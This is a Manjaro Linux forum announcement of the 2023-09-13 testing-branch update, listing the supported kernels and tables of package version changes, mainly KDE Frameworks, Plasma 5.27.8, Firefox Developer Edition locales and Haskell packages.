<h2><a name="additional-info-1" class="anchor" href="https://forum.manjaro.org/#additional-info-1"></a>Additional Info</h2>

Python 3.11 info <a href="https://forum.manjaro.org/t/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/147907/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/147907/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux419 4.19.294</li>
<li>linux54 5.4.256</li>
<li>linux510 5.10.194</li>
<li>linux515 5.15.131</li>
<li>linux61 6.1.52</li>
<li>linux64 6.4.15</li>
<li>linux65 6.5.2</li>
<li>linux66 6.6.0rc1</li>
<li>linux61-rt 6.1.46_rt13</li>
<li>linux64-rt 6.4.6_rt8</li>
<li>linux65-rt 6.5.2_rt8</li>
</ul>
<p><strong>Package Changes</strong> (Wed Sep 13 07:57:42 CEST 2023)</p>
<ul>
<li>testing core x86_64:  8 new and 8 removed package(s)</li>
<li>testing extra x86_64:  540 new and 539 removed package(s)</li>
<li>testing multilib x86_64:  2 new and 2 removed package(s)</li>
</ul>
<p><strong>Overlay Changes</strong></p>
<ul>
<li>testing core x86_64:  4 new and 2 removed package(s)</li>
<li>testing extra x86_64:  28 new and 20 removed package(s)</li>
<li>testing multilib x86_64:  1 new and 1 removed package(s)</li>
<li>testing kde-unstable x86_64:  137 new and 136 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                          linux65-rt            6.5_rt6-1          6.5.2_rt8-1
                  linux65-rt-headers            6.5_rt6-1          6.5.2_rt8-1
                             linux66                    -           6.6.0rc1-1
                     linux66-headers                    -           6.6.0rc1-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                               glib2             2.78.0-1             2.78.0-2
                          glib2-docs             2.78.0-1             2.78.0-2
                               lemon             3.43.0-1             3.43.1-1
                          libarchive              3.7.1-1              3.7.2-1
                              sqlite             3.43.0-1             3.43.1-1
                     sqlite-analyzer             3.43.0-1             3.43.1-1
                          sqlite-doc             3.43.0-1             3.43.1-1
                          sqlite-tcl             3.43.0-1             3.43.1-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                            chromium      117.0.5938.62-1                    -
                       discover-snap             5.27.7-2             5.27.8-1
                linux65-rt-acpi_call              1.2.2-1              1.2.2-2
                 linux65-rt-bbswitch                0.8-1                0.8-2
              linux65-rt-broadcom-wl       6.30.223.271-1       6.30.223.271-2
             linux65-rt-nvidia-390xx            390.157-1            390.157-2
             linux65-rt-nvidia-470xx         470.199.02-1         470.199.02-2
                   linux65-rt-nvidia         535.104.05-1         535.104.05-2
                    linux65-rt-r8168           8.051.02-1           8.051.02-2
                linux65-rt-rtl8723bu           20220818-1           20220818-2
                 linux65-rt-tp_smapi               0.44-1               0.44-2
              linux65-rt-vhba-module           20211218-1           20211218-2
  linux65-rt-virtualbox-host-modules             7.0.10-1             7.0.10-2
                              lutris             0.5.13-7             0.5.13-8
                                mhwd             0.6.5-26             0.6.5-27
                             mhwd-db             0.6.5-26             0.6.5-27
                              octopi             0.14.0-6             0.15.0-1
          octopi-notifier-frameworks             0.14.0-6             0.15.0-1
                 octopi-notifier-qt5             0.14.0-6             0.15.0-1
                    steam-aui-config           20230908-3           20230912-1
                   linux66-acpi_call                    -            1.2.2-0.1
                    linux66-bbswitch                    -              0.8-0.1
                 linux66-broadcom-wl                    -     6.30.223.271-0.1
                      linux66-nvidia                    -       535.104.05-0.1
                       linux66-r8168                    -         8.051.02-0.2
                   linux66-rtl8723bu                    -         20220818-0.1
                    linux66-tp_smapi                    -             0.44-0.1
                 linux66-vhba-module                    -         20211218-0.1
     linux66-virtualbox-host-modules                    -           7.0.10-0.1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                             arch-hs          0.11.1.0-45          0.11.1.0-46
                                arti              1.1.7-1              1.1.8-1
                              attica            5.109.0-1            5.110.0-1
                        aura-browser             5.27.7-1             5.27.8-1
                               baloo            5.109.0-1            5.110.0-1
                            binaryen              1:114-1              1:115-1
                           bluedevil           1:5.27.7-1           1:5.27.8-1
                            bluez-qt            5.109.0-1            5.110.0-1
                              breeze             5.27.7-1             5.27.8-1
                         breeze-grub             5.27.7-1             5.27.8-1
                          breeze-gtk             5.27.7-1             5.27.8-1
                        breeze-icons            5.109.0-1            5.110.0-1
                     breeze-plymouth             5.27.7-1             5.27.8-1
                            buildbot              3.9.0-1              3.9.2-1
                     buildbot-common              3.9.0-1              3.9.2-1
                       buildbot-docs              3.9.0-1              3.9.2-1
                     buildbot-worker              3.9.0-1              3.9.2-1
                            buildkit             0.12.1-1             0.12.2-1
                       cabal-install          3.4.1.0-125          3.4.1.0-126
                          cairo-dock              3.4.1-4              3.4.1-5
                          cargo-edit             0.12.1-1             0.12.2-1
                          cargo-hack              0.6.6-1              0.6.7-1
                      cargo-zigbuild             0.17.2-1             0.17.3-1
                            chromium      117.0.5938.48-1      117.0.5938.62-1
                                code             1.82.0-1             1.82.0-2
                          containerd              1.7.5-1              1.7.6-1
                             cordova             11.1.0-1             12.0.0-1
                               darcs           2.16.5-184           2.16.5-185
                          deepin-api             5.5.32-2             5.5.32-3
                            discover             5.27.7-2             5.27.8-1
                                dolt             1.14.0-1             1.14.1-1
                             drkonqi             5.27.7-1             5.27.8-1
                 extra-cmake-modules            5.109.0-1            5.110.0-1
                                 eza             0.11.0-3             0.11.1-1
                        feathernotes              1.1.0-1              1.1.1-1
           firefox-developer-edition            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-ach            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-af            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-an            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ar            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-ast            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-az            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-be            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-bg            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-bn            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-br            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-bs            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ca            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-ca-valencia      118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-cak            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-cs            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-cy            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-da            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-de            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-dsb            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-el            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-en-ca            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-en-gb            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-en-us            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-eo            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-es-ar            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-es-cl            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-es-es            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-es-mx            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-et            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-eu            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-fa            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ff            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-fi            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-fr            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-fur            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-fy-nl            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-ga-ie            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-gd            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-gl            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-gn            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-gu-in            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-he            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-hi-in            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-hr            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-hsb            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-hu            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-hy-am            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ia            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-id            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-is            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-it            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ja            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ka            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-kab            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-kk            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-km            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-kn            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ko            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-lij            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-lt            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-lv            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-mk            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-mr            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ms            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-my            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-nb-no            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-ne-np            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-nl            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-nn-no            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-oc            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-pa-in            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-pl            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-pt-br            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-pt-pt            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-rm            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ro            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ru            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-sc            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-sco            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-si            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-sk            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-sl            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-son            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-sq            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-sr            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-sv-se            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-szl            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ta            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-te            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-tg            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-th            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-tl            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-tr            118.0b6-1            118.0b7-1
  firefox-developer-edition-i18n-trs            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-uk            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-ur            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-uz            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-vi            118.0b6-1            118.0b7-1
   firefox-developer-edition-i18n-xh            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-zh-cn            118.0b6-1            118.0b7-1
firefox-developer-edition-i18n-zh-tw            118.0b6-1            118.0b7-1
                     flatpak-builder              1.2.3-1              1.2.3-2
                         flatpak-kcm             5.27.7-1             5.27.8-1
                              fluidd             1.25.2-1             1.25.3-1
                             forgejo           1.20.3.0-2           1.20.4.0-1
                frameworkintegration            5.109.0-1            5.110.0-1
                               fwupd              1.9.5-1              1.9.5-2
                            geogebra          6.0.794.0-1          6.0.801.0-1
                           git-annex       10.20230626-32       10.20230626-33
                         glibmm-2.68             2.76.0-1             2.78.0-1
                    glibmm-2.68-docs             2.76.0-1             2.78.0-1
                         go-ethereum             1.12.2-1             1.13.0-1
                              gopass             1.15.7-2             1.15.8-1
                         gopass-hibp             1.15.7-1             1.15.8-1
                      gopass-jsonapi             1.15.7-1             1.15.8-1
                    haskell-arch-web               0.2-35               0.2-36
                haskell-authenticate          1.3.5.1-191          1.3.5.1-192
                         haskell-aws              0.24-58              0.24-59
                 haskell-casa-client            0.0.1-614            0.0.1-615
                  haskell-cheapskate          0.1.1.2-571          0.1.1.2-572
                haskell-coinbase-pro           0.9.3.2-83           0.9.3.2-84
                      haskell-ghcide           1.9.0.0-52           1.9.0.0-53
           haskell-ghcide-test-utils           1.8.0.0-92           1.8.0.0-93
                     haskell-hadrian          0.1.0.0-111          0.1.0.0-112
                      haskell-hakyll          4.16.0.0-42          4.16.0.0-43
haskell-hls-alternate-number-format-plugin     1.3.0.0-52           1.3.0.0-53
         haskell-hls-brittany-plugin           1.1.0.0-56           1.1.0.0-57
        haskell-hls-cabal-fmt-plugin           0.1.0.0-52           0.1.0.0-53
            haskell-hls-cabal-plugin           0.1.0.0-52           0.1.0.0-53
   haskell-hls-call-hierarchy-plugin           1.2.0.0-52           1.2.0.0-53
haskell-hls-change-type-signature-plugin       1.1.0.0-52           1.1.0.0-53
            haskell-hls-class-plugin           1.1.1.0-52           1.1.1.0-53
       haskell-hls-code-range-plugin           1.1.0.0-52           1.1.0.0-53
             haskell-hls-eval-plugin           1.4.0.0-52           1.4.0.0-53
  haskell-hls-explicit-fixity-plugin           1.1.0.0-52           1.1.0.0-53
 haskell-hls-explicit-imports-plugin           1.2.0.0-52           1.2.0.0-53
haskell-hls-explicit-record-fields-plugin      1.0.0.0-52           1.0.0.0-53
         haskell-hls-floskell-plugin           1.0.2.0-53           1.0.2.0-54
         haskell-hls-fourmolu-plugin           1.1.1.0-53           1.1.1.0-54
             haskell-hls-gadt-plugin           1.0.1.0-52           1.0.1.0-53
                   haskell-hls-graph           1.9.0.0-39           1.9.0.0-40
 haskell-hls-haddock-comments-plugin           1.1.1.0-52           1.1.1.0-53
            haskell-hls-hlint-plugin           1.1.1.0-52           1.1.1.0-53
      haskell-hls-module-name-plugin           1.1.1.0-52           1.1.1.0-53
           haskell-hls-ormolu-plugin           1.0.3.0-53           1.0.3.0-54
              haskell-hls-plugin-api           1.6.0.0-44           1.6.0.0-45
          haskell-hls-pragmas-plugin           1.0.4.0-52           1.0.4.0-53
haskell-hls-qualify-imported-names-plugin      1.0.2.0-52           1.0.2.0-53
         haskell-hls-refactor-plugin           1.1.0.0-52           1.1.0.0-53
   haskell-hls-refine-imports-plugin           1.0.4.0-52           1.0.4.0-53
           haskell-hls-rename-plugin           1.0.2.0-52           1.0.2.0-53
           haskell-hls-retrie-plugin           1.0.3.0-52           1.0.3.0-53
           haskell-hls-splice-plugin           1.0.3.0-52           1.0.3.0-53
  haskell-hls-stylish-haskell-plugin           1.0.1.2-52           1.0.1.2-53
          haskell-hls-tactics-plugin           1.8.0.0-54           1.8.0.0-55
              haskell-hls-test-utils           1.5.0.0-52           1.5.0.0-53
                     haskell-hoauth2             2.2.0-87             2.2.0-88
                   haskell-hspec-wai           0.11.1-351           0.11.1-352
              haskell-hspec-wai-json           0.11.0-412           0.11.0-413
                        haskell-http         4000.4.1-127         4000.4.1-128
                haskell-http-conduit           2.3.8.2-20           2.3.8.2-21
               haskell-http-download            0.2.1.0-5            0.2.1.0-6
                       haskell-http2             3.0.3-55             3.0.3-56
                       haskell-http3             0.0.1-51             0.0.1-52
                   haskell-js-jquery            3.3.1-934            3.3.1-935
           haskell-lambdabot-trusted           5.3.1.1-11           5.3.1.1-12
             haskell-language-server           1.9.0.0-65           1.9.0.0-66
                 haskell-network-run              0.2.5-5              0.2.6-1
                        haskell-oeis           0.3.10-108           0.3.10-109
               haskell-pandoc-server              0.1-111              0.1-112
                      haskell-pantry            0.5.7-148            0.5.7-149
                   haskell-recaptcha          0.1.0.4-108          0.1.0.4-109
                      haskell-scotty            0.12.1-72            0.12.1-73
              haskell-servant-client             0.19-116             0.19-117
              haskell-servant-server            0.19.2-81            0.19.2-82
                       haskell-shake           0.19.6-111           0.19.6-112
            haskell-wai-app-file-cgi           3.1.10-117           3.1.10-118
              haskell-wai-app-static              3.1.8-2              3.1.8-3
                   haskell-wai-extra         3.1.13.0-148         3.1.13.0-150
          haskell-wai-handler-launch          3.0.3.1-542          3.0.3.1-543
             haskell-wai-http2-extra            0.1.3-105            0.1.3-106
                  haskell-wai-logger            2.4.0-299            2.4.0-301
       haskell-wai-middleware-static            0.9.2-181            0.9.2-182
                        haskell-warp             3.3.29-2             3.3.29-3
                   haskell-warp-quic            0.0.0-117            0.0.0-118
                    haskell-warp-tls              3.4.2-2              3.4.2-3
                       haskell-yesod          1.6.2.1-128          1.6.2.1-129
                  haskell-yesod-auth          1.6.11.1-59          1.6.11.1-60
                  haskell-yesod-core          1.6.24.4-13          1.6.24.4-14
                  haskell-yesod-form              1.7.6-5              1.7.6-6
            haskell-yesod-persistent          1.6.0.8-193          1.6.0.8-194
                haskell-yesod-static          1.6.1.0-639          1.6.1.0-640
                  haskell-yesod-test           1.6.15-119           1.6.15-120
                         hledger-web              1.29-46              1.29-47
                      home-assistant         1:2023.8.4-1         1:2023.9.1-1
                              hoogle         5.0.18.3-178         5.0.18.3-179
                               hound              0.7.1-1              0.7.1-2
                               iaito              5.8.4-2              5.8.8-1
                 ibus-typing-booster             2.24.0-1             2.24.1-1
                               icewm              3.4.1-1              3.4.2-1
                               idris            1.3.4-134            1.3.4-135
                               imake              1.0.9-1              1.0.9-2
                    intel-oneapi-tbb          2021.10.0-1          2021.10.0-2
                               julia            2:1.9.3-1            2:1.9.3-2
                         kactivities            5.109.0-1            5.110.0-1
                   kactivities-stats            5.109.0-1            5.110.0-1
                   kactivitymanagerd             5.27.7-1             5.27.8-1
                             kapidox            5.109.0-1            5.110.0-1
                            karchive            5.109.0-1            5.110.0-1
                               kauth            5.109.0-1            5.110.0-1
                          kbookmarks            5.109.0-1            5.110.0-1
                       kcalendarcore            5.109.0-1            5.110.0-1
                            kcmutils            5.109.0-1            5.110.0-1
                             kcodecs            5.109.0-1            5.110.0-1
                         kcompletion            5.109.0-1            5.110.0-1
                             kconfig            5.109.0-1            5.110.0-1
                      kconfigwidgets            5.109.0-1            5.110.0-1
                           kcontacts          1:5.109.0-1          1:5.110.0-1
                         kcoreaddons            5.109.0-1            5.110.0-1
                              kcrash            5.109.0-1            5.110.0-1
                                kdav          1:5.109.0-1          1:5.110.0-1
                         kdbusaddons            5.109.0-1            5.110.0-1
                       kde-cli-tools             5.27.7-1             5.27.8-1
                      kde-gtk-config             5.27.7-1             5.27.8-1
                        kdeclarative            5.109.0-1            5.110.0-1
                         kdecoration             5.27.7-1             5.27.8-1
                                kded            5.109.0-1            5.110.0-1
                     kdelibs4support            5.109.0-1            5.110.0-1
                    kdeplasma-addons             5.27.7-1             5.27.8-1
                     kdesignerplugin            5.109.0-1            5.110.0-1
                               kdesu            5.109.0-1            5.110.0-1
                              kdnssd            5.109.0-1            5.110.0-1
                           kdoctools            5.109.0-1            5.110.0-1
                             keepass               2.54-1               2.54-2
                          kemoticons            5.109.0-1            5.110.0-1
                            keycloak             22.0.1-1             22.0.2-1
                       kfilemetadata            5.109.0-1            5.110.0-1
                             kgamma5             5.27.7-1             5.27.8-1
                        kglobalaccel            5.109.0-1            5.110.0-1
                          kguiaddons            5.109.0-1            5.110.0-1
                           kholidays          1:5.109.0-1          1:5.110.0-1
                            khotkeys             5.27.7-1             5.27.8-1
                               khtml            5.109.0-1            5.110.0-1
                               ki18n            5.109.0-1            5.110.0-1
                         kiconthemes            5.109.0-1            5.110.0-1
                           kidletime            5.109.0-1            5.110.0-1
                       kimageformats            5.109.0-3            5.110.0-1
                         kinfocenter             5.27.7-1             5.27.8-1
                               kinit            5.109.0-1            5.110.0-1
                                 kio            5.109.0-2            5.110.0-1
                           kirigami2            5.109.0-1            5.110.0-1
                         kitemmodels            5.109.0-1            5.110.0-1
                          kitemviews            5.109.0-1            5.110.0-1
                         kjobwidgets            5.109.0-1            5.110.0-1
                                 kjs            5.109.0-1            5.110.0-1
                           kmenuedit             5.27.7-1             5.27.8-1
                           knewstuff            5.109.0-1            5.110.0-1
                      knotifications            5.109.0-1            5.110.0-1
                       knotifyconfig            5.109.0-1            5.110.0-1
                            kpackage            5.109.0-1            5.110.0-1
                              kparts            5.109.0-1            5.110.0-1
                             kpeople            5.109.0-1            5.110.0-1
                           kpipewire             5.27.7-1             5.27.8-1
                           kplotting            5.109.0-1            5.110.0-1
                                kpty            5.109.0-1            5.110.0-1
                        kquickcharts            5.109.0-1            5.110.0-1
                               kross            5.109.0-1            5.110.0-1
                             krunner            5.109.0-1            5.110.0-1
                             kscreen             5.27.7-1             5.27.8-1
                       kscreenlocker             5.27.7-1             5.27.8-1
                            kservice            5.109.0-1            5.110.0-1
                         ksshaskpass             5.27.7-1             5.27.8-1
                        ksystemstats             5.27.7-1             5.27.8-1
                         ktexteditor            5.109.0-1            5.110.0-1
                        ktextwidgets            5.109.0-1            5.110.0-1
                     kunitconversion            5.109.0-1            5.110.0-1
                             kwallet            5.109.0-1            5.110.0-1
                         kwallet-pam             5.27.7-1             5.27.8-1
                            kwayland            5.109.0-1            5.110.0-1
                kwayland-integration             5.27.7-1             5.27.8-1
                      kwidgetsaddons            5.109.0-1            5.110.0-1
                                kwin             5.27.7-1             5.27.8-1
                       kwindowsystem            5.109.0-1            5.110.0-1
                             kwrited             5.27.7-1             5.27.8-1
                             kxmlgui            5.109.0-1            5.110.0-1
                          latex2html               2023-1             2023.2-1
                      layer-shell-qt             5.27.7-1             5.27.8-1
                          libalkimia              8.1.1-1              8.1.2-1
                           libfabric             1.18.1-1             1.18.2-1
                          libkscreen             5.27.7-1             5.27.8-1
                        libksysguard             5.27.7-1             5.27.8-1
                           libportal                0.6-1                0.7-1
                      libportal-docs                0.6-1                0.7-1
                      libportal-gtk3                0.6-1                0.7-1
                      libportal-gtk4                0.6-1                0.7-1
                       libportal-qt5                0.6-1                0.7-1
                         libquotient            0.8.1.1-1            0.8.1.2-1
                 libretro-beetle-pce               1189-1               1193-1
            libretro-beetle-pce-fast               1228-1               1229-1
                 libretro-beetle-psx               2682-1               2683-1
              libretro-beetle-psx-hw               2682-1               2683-1
          libretro-beetle-supergrafx                990-1                992-1
                      libretro-bsnes             1:3102-1             1:3104-1
                    libretro-flycast               5784-1               5789-1
                   libretro-gambatte               1000-1               1003-1
            libretro-genesis-plus-gx               2059-1               2064-1
                       libretro-mame              87856-1              88263-1
                   libretro-overlays                256-1                263-1
                       libretro-play               7863-1               7935-1
                     libretro-ppsspp              37801-1              38311-1
                    libretro-scummvm             143193-1             144893-1
              libretro-shaders-slang               1308-1               1321-1
                     libretro-snes9x             1:2448-1             1:2507-1
                       libspectmorph              0.5.2-4              0.6.0-2
                             libwebp              1.3.1-1              1.3.1-2
                              limine       5.20230909.0-1       5.20230911.0-1
                              mairix               0.24-3               0.24-4
                           mercurial              6.5.1-1              6.5.2-1
                              midori                9.0-5                9.0-6
                           mighttpd2             4.0.3-23             4.0.3-24
                               milou             5.27.7-1             5.27.8-1
                 mkinitcpio-dropbear              0.0.3-6              0.0.3-7
                                 mlt             7.18.0-2             7.18.0-4
                     modemmanager-qt            5.109.0-1            5.110.0-1
                      mongo-c-driver             1.24.3-1             1.24.4-1
                             myrepos         1.20180726-6         1.20180726-7
                             netdata             1.42.2-1             1.42.3-1
                   networkmanager-qt            5.109.0-1            5.110.0-1
                   npm-check-updates            16.12.2-1            16.12.3-1
                                nyxt              3.6.0-1              3.7.0-1
                            obsidian              1.4.5-1             1.4.11-1
                               opera      102.0.4880.40-1      102.0.4880.46-1
                              oxygen             5.27.7-1             5.27.8-1
                        oxygen-icons          1:5.109.0-1          1:5.110.0-1
                    oxygen-icons-svg          1:5.109.0-1          1:5.110.0-1
                       oxygen-sounds             5.27.7-1             5.27.8-1
                          pandoc-cli             0.1.1-43             0.1.1-44
                           perl-tidy           20230701-1           20230909-1
                        plank-player             5.27.7-1             5.27.8-1
                    plasma-bigscreen             5.27.7-1             5.27.8-1
          plasma-browser-integration             5.27.7-1             5.27.8-1
                      plasma-desktop           5.27.7.1-1             5.27.8-1
                        plasma-disks             5.27.7-1             5.27.8-1
                     plasma-firewall             5.27.7-1             5.27.8-1
                    plasma-framework            5.109.0-1            5.110.0-1
                  plasma-integration             5.27.7-1             5.27.8-1
                         plasma-nano             5.27.7-1             5.27.8-1
                           plasma-nm             5.27.7-1             5.27.8-1
                           plasma-pa             5.27.7-1             5.27.8-1
            plasma-remotecontrollers             5.27.7-1             5.27.8-1
                          plasma-sdk           5.27.7.1-1             5.27.8-1
                plasma-systemmonitor             5.27.7-1             5.27.8-1
                  plasma-thunderbolt             5.27.7-1             5.27.8-1
                        plasma-vault             5.27.7-1             5.27.8-1
              plasma-wayland-session             5.27.7-2             5.27.8-1
                      plasma-welcome             5.27.7-1             5.27.8-1
                    plasma-workspace             5.27.7-2             5.27.8-1
         plasma-workspace-wallpapers             5.27.7-1             5.27.8-1
                        plymouth-kcm             5.27.7-1             5.27.8-1
                                pnpm              8.7.4-1              8.7.5-1
                    polkit-kde-agent             5.27.7-1             5.27.8-1
                           postgrest           10.0.0-137           10.0.0-138
                          powerdevil             5.27.7-1             5.27.8-1
                              prison            5.109.0-1            5.110.0-1
                                proj              9.2.1-1              9.3.0-1
                         proxytunnel      1.10.20210604-2               1.11-1
                             purpose            5.109.0-1            5.110.0-1
                  python-aiodiscover             1.4.16-1              1.5.1-1
                        python-bleak             0.20.2-1             0.21.1-1
              python-buildbot-badges              3.9.0-1              3.9.2-1
        python-buildbot-console-view              3.9.0-1              3.9.2-1
           python-buildbot-grid-view              3.9.0-1              3.9.2-1
  python-buildbot-react-console-view              3.9.0-1              3.9.2-1
     python-buildbot-react-grid-view              3.9.0-1              3.9.2-1
      python-buildbot-waterfall-view              3.9.0-1              3.9.2-1
     python-buildbot-wsgi-dashboards              3.9.0-1              3.9.2-1
                 python-buildbot-www              3.9.0-1              3.9.2-1
           python-buildbot-www-react              3.9.0-1              3.9.2-1
                    python-dbus-fast             1.94.0-1              2.2.0-1
                      python-debugpy              1.7.0-1              1.8.0-1
      python-django-modeltranslation            0.18.11-1            0.18.12-1
                        python-faker             19.3.1-1             19.4.0-1
                      python-gobject             3.44.1-4             3.46.0-1
                 python-gobject-docs             3.44.1-4             3.46.0-1
                           python-jq              1.5.0-1              1.6.0-1
            python-jupyterlab-server             2.24.0-1             2.25.0-1
                       python-loguru              0.7.1-1              0.7.2-1
                 python-mitmproxy-rs              0.2.2-1              0.3.0-1
             python-poetry-plugin-up              0.3.0-1              0.4.0-1
                     python-pyfiglet              1.0.0-1              1.0.1-1
               python-pyrate-limiter             2.10.0-1              3.1.0-1
                  python-pytesseract             0.3.11-1             0.3.12-1
                         python-ruff            0.0.287-1            0.0.289-1
           python-setuptools-gettext              0.1.1-2              0.1.5-1
               python-ulid-transform              0.8.0-1              0.8.1-1
             python-websocket-client              1.6.2-1              1.6.3-1
                  qqc2-desktop-style            5.109.0-1            5.110.0-1
                          qt5-script            5.15.14-2            5.15.15-1
                       qt5-webengine            5.15.14-5            5.15.15-1
                            r2ghidra              5.8.4-1              5.8.6-1
                             radare2              5.8.6-2              5.8.8-1
                         release-plz             0.3.21-1             0.3.22-1
               retroarch-assets-glui              1:460-1              1:469-1
              retroarch-assets-ozone              1:460-1              1:469-1
                retroarch-assets-xmb              1:460-1              1:469-1
                                ruff            0.0.287-1            0.0.289-1
                            ruff-lsp             0.0.38-1             0.0.39-1
                                scip              8.0.3-2              8.0.4-1
                            sddm-kcm             5.27.7-1             5.27.8-1
                                sile            0.14.11-1            0.14.11-2
                               solid            5.109.0-1            5.110.0-1
                              sonnet            5.109.0-1            5.110.0-1
                          spectmorph              0.5.2-4              0.6.0-2
              spectmorph-instruments              0.5.2-4              0.6.0-2
                      spectmorph-lv2              0.5.2-4              0.6.0-2
                    spectmorph-tools              0.5.2-4              0.6.0-2
                      spectmorph-vst              0.5.2-4              0.6.0-2
